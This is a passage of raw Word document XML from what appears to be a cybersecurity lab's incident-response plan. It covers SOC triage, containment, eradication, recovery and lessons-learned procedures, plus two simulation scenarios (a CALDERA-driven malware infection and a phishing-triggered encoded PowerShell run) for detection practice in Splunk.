    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="1F8E851F" w14:textId="0D4F8198">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Extract details (IP, host, user, process, hash).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="147448AB" w14:textId="17D798F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Check activity against baseline.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="4BB806BF" w14:textId="64AE5462">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Validate with Threat Intel and IOCs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="2CAE6918" w14:textId="3D4A3241">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Determine</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severity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="10EBCBEF" w14:textId="196782C2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Document analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="5A1F625D" w14:textId="5D7A6EAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>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Escalate to L2 if TP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="65FA036E" w14:textId="3DF26CCC">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3.2</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="6BB8538E">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 xml:space="preserve"> </w:t>
      </w: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Containment Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="17E727D8" w14:textId="1C289B5C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281"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Short-Term</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="24A91CC1" w14:textId="3053E203">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>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Isolate host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="7F3BB8AB" w14:textId="0D01CA8C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>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Kill malicious processes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="6CCCBDC6" w14:textId="5049D3AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>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Block C2 traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="71C5A8CB" w14:textId="19217CDD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>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Alert IRT.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="425CD261" w14:textId="7CC741B5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281"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28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Long-Term</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="1CD1404A" w14:textId="633EFA6A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Disable compromised accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="524F3624" w14:textId="1731F453">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Reset passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="4A1F286B" w14:textId="05D77243">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Patch exploited systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="609FCB71" w14:textId="69CE4813">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>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Add detections to SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="37E6488D" w14:textId="7186998D">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3.3 Eradication Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="0652413D" w14:textId="3C6098E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Remove malware files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="0956A01E" w14:textId="1EA4A655">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Delete persistence mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="3B15E9F9" w14:textId="05E98D31">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Patch vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="36CA614A" w14:textId="5DD705B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Run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full</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scans.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="30FF08FE" w14:textId="6B792B19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>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Confirm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environment</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is clean.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="3C66AA94" w14:textId="7ED88CBD">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3.4 Recovery Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="7CA8318E" w14:textId="4CBE4C6A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>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Restore systems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from</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clean backups.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="774FAF81" w14:textId="35033164">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>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Validate system and service health.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="56C261D6" w14:textId="3A820972">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>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Reconnect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system</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to network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="2808816C" w14:textId="3AC37F61">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>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Monitor for anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="06626162" w14:textId="5E336CCB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299"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pPr>
      <w:r w:rsidRPr="166587AE" w:rsidR="09F12D96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3.5 Lessons Learned Procedure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="7766B262" w14:textId="7D8D68E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Hold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review</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meeting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="4A259046" w14:textId="36EE6E01">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Identify</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weaknesses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&amp; areas</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of improvement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="2C3AB24B" w14:textId="232B69C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Update playbooks &amp; policies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="7CF1466D" w14:textId="40AFCF92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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Add IOCs and TTPs to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detection</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="09F12D96" w:rsidP="166587AE" w:rsidRDefault="09F12D96" w14:paraId="6DCDC6F5" w14:textId="2E1B5669">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:num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Create </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final</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="09F12D96">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t xml:space="preserve"> incident report.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="0A908009" w14:textId="582410CF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="0607CB03" w14:textId="725C4E08">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322" w:afterAutospacing="off"/>
        <w:jc w:val="both"/>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Simulation Scenarios &amp; Environment Preparation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="3F833F25" w14:textId="77A56A1C">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4FD69A77" w14:textId="5C08C34D">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32"/>
          <w:szCs w:val="32"/>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1.</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32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Simulation Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="61554AE7" w14:textId="77B3D96B">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Scenario 1: Malware Infection via CALDERA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="14402B7D" w14:textId="18219C06">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Description:</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 CALDERA agent simulates a malware infection on Windows VM by performing adversary behaviors such as process creation, persistence, privilege escalation, and lateral movement attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="191BB124" w14:textId="375C55A0">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Trigger:</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CALDERA server deploys an agent on the Windows VM and starts an operation (e.g.,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Sandcat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or Atomic Red Team).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1B3EE62E" w14:textId="2C46F0F6">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Expected Attacker Activity:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="625E3A48" w14:textId="2FBFD3D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Drop and execute malicious payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="310D7B67" w14:textId="1B7B73E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Create suspicious processes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6CF6D8CC" w14:textId="3534A30E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Modify registry keys for persistence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="455B991C" w14:textId="6D92077D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Attempt credential access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2AD0BA87" w14:textId="34F031AC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Attempt network discovery or lateral movement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4F4720FB" w14:textId="17960F52">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Logs &amp; Evidence Expected:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="60016DE6" w14:textId="385417D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Sysmon logs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ProcessCreate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RegistryEvent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NetworkConnect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7F8CFA9D" w14:textId="0AD74775">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Logs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forwarded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to Splunk via Universal Forwarder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="766444B9" w14:textId="02BDC132">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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CALDERA operation logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="34C38CE1" w14:textId="43668E3E">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Expected IRT Response (PICERL):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="41E70B24" w14:textId="341B77D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Identification: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Splunk alerts detect suspicious activity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="35A34CA9" w14:textId="22B0B9EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Containment: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Isolate Windows VM or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terminate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malicious processes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="42519BBB" w14:textId="59B381F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Eradication: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Remove CALDERA agent (simulated malware)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="112E871A" w14:textId="17867955">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Recovery:</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Restore VM from clean snapshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="64D91175" w14:textId="60702D2F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Lessons Learned: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Improve alert logic and detection rules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5F62C96E" w14:textId="45AC20B2">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7E1DF47A" wp14:anchorId="7848396E">
            <wp:extent cx="5943600" cy="4114800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17977486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7748648" name="Picture 1797748648"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1588784643">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4114800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4148CEC0" w14:textId="15E61583">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Scenario 2: Phishing Attack Leading to Suspicious PowerShell Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5D100ACA" w14:textId="2C8D3DFB">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Description:</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 simulated phishing payload is executed on the Windows VM, resulting in a Base64‑encoded PowerShell command (performed manually or through CALDERA).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="00E187AC" w14:textId="3A3CEC56">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Trigger:</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Execution of a malicious PowerShell command on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2F6570A7" w14:textId="5446D93E">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Expected Attacker Activity:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="71AA0026" w14:textId="2590C87E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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PowerShell running encoded/obfuscated commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="7BFD4E08" w14:textId="43BABC19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Attempted outbound C2 communication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="06712306" w14:textId="45E0B387">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Creation of scheduled tasks or persistence mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="7748B783" w14:textId="2C453F81">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Logs &amp; Evidence Expected:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5D9EBDA8" w14:textId="5BEFF46A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Sysmon Event ID 1 (PowerShell execution)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="29D63D01" w14:textId="78A9CFD4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Sysmon Event ID 3 (Network connections)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2F122F97" w14:textId="6F96A6A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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 alerts for suspicious PowerShell activity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="456C9062" w14:textId="61477E72">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Expected IRT Response:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="10F0F9F4" w14:textId="2BFC8BEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Identification: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Splunk detects PowerShell encoded command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="3407AC3F" w14:textId="4041B65D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Containment: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Disable affected user account or isolate device</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="71FE71A1" w14:textId="26C6370C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Eradication: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Remove scheduled tasks and kill malicious processes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6915F448" w14:textId="11FFEDF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Recovery:</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Apply system hardening and reset credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1EC2FB5C" w14:textId="0D274786">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Lessons Learned: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Improve phishing awareness + SIEM rules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="243E5180" w14:textId="0CF8B701">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5AE46C07" wp14:anchorId="053DE9E6">
            <wp:extent cx="5943600" cy="2533650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12969738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6973833" name="Picture 1296973833"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId680244670">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2533650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="50C519AC" w14:textId="2BF4DF9F">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2. Simulation Environment Preparation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="46C901A9" w14:textId="363F6AD0">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Environment Components</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4E192B96" w14:textId="2A34BBF9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="319" w:beforeAutospacing="off" w:after="319" w:afterAutospacing="off"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="majorAscii" w:hAnsiTheme="majorAscii" w:eastAsiaTheme="majorAscii" w:cstheme="majorAscii"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>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1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1. Splunk Server (Ubuntu)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="50B47D40" w14:textId="501DAA51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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 Enterprise installed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="69F56E95" w14:textId="6A12F9CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Indexing, data inputs, and dashboards configured</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="369764F6" w14:textId="7C58381D">
      <w:pPr>
